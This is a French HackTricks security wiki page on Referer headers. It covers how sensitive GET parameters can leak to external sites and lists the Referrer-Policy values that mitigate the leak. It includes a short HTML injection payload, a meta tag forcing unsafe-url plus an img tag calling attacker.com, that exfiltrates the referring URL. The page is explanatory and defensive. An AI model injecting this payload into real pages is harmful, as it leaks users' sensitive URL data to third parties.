3.7 KiB
{% hint style="success" %}
Apprenez et pratiquez le piratage AWS : Formation HackTricks AWS Red Team Expert (ARTE)
Apprenez et pratiquez le piratage GCP : Formation HackTricks GCP Red Team Expert (GRTE)
Soutenez HackTricks
- Consultez les plans d'abonnement!
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts GitHub.
En-têtes de référence et politique
Le referrer est l'en-tête utilisé par les navigateurs pour indiquer quelle était la page précédemment visitée.
Fuite d'informations sensibles
Si à un moment donné à l'intérieur d'une page web des informations sensibles sont situées dans les paramètres d'une requête GET, si la page contient des liens vers des sources externes ou si un attaquant est capable de faire/suggérer (ingénierie sociale) à l'utilisateur de visiter une URL contrôlée par l'attaquant. Il pourrait être en mesure d'exfiltrer les informations sensibles à l'intérieur de la dernière requête GET.
Atténuation
Vous pouvez faire en sorte que le navigateur suive une politique de referrer qui pourrait éviter l'envoi des informations sensibles vers d'autres applications web :
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Contre-mesure
Vous pouvez outrepasser cette règle en utilisant une balise meta HTML (l'attaquant doit exploiter une injection HTML) :
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Défense
Ne jamais mettre de données sensibles dans les paramètres GET ou les chemins de l'URL.
{% hint style="success" %}
Apprenez et pratiquez le piratage AWS :Formation HackTricks AWS Red Team Expert (ARTE)
Apprenez et pratiquez le piratage GCP : Formation HackTricks GCP Red Team Expert (GRTE)
Soutenez HackTricks
- Consultez les plans d'abonnement!
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.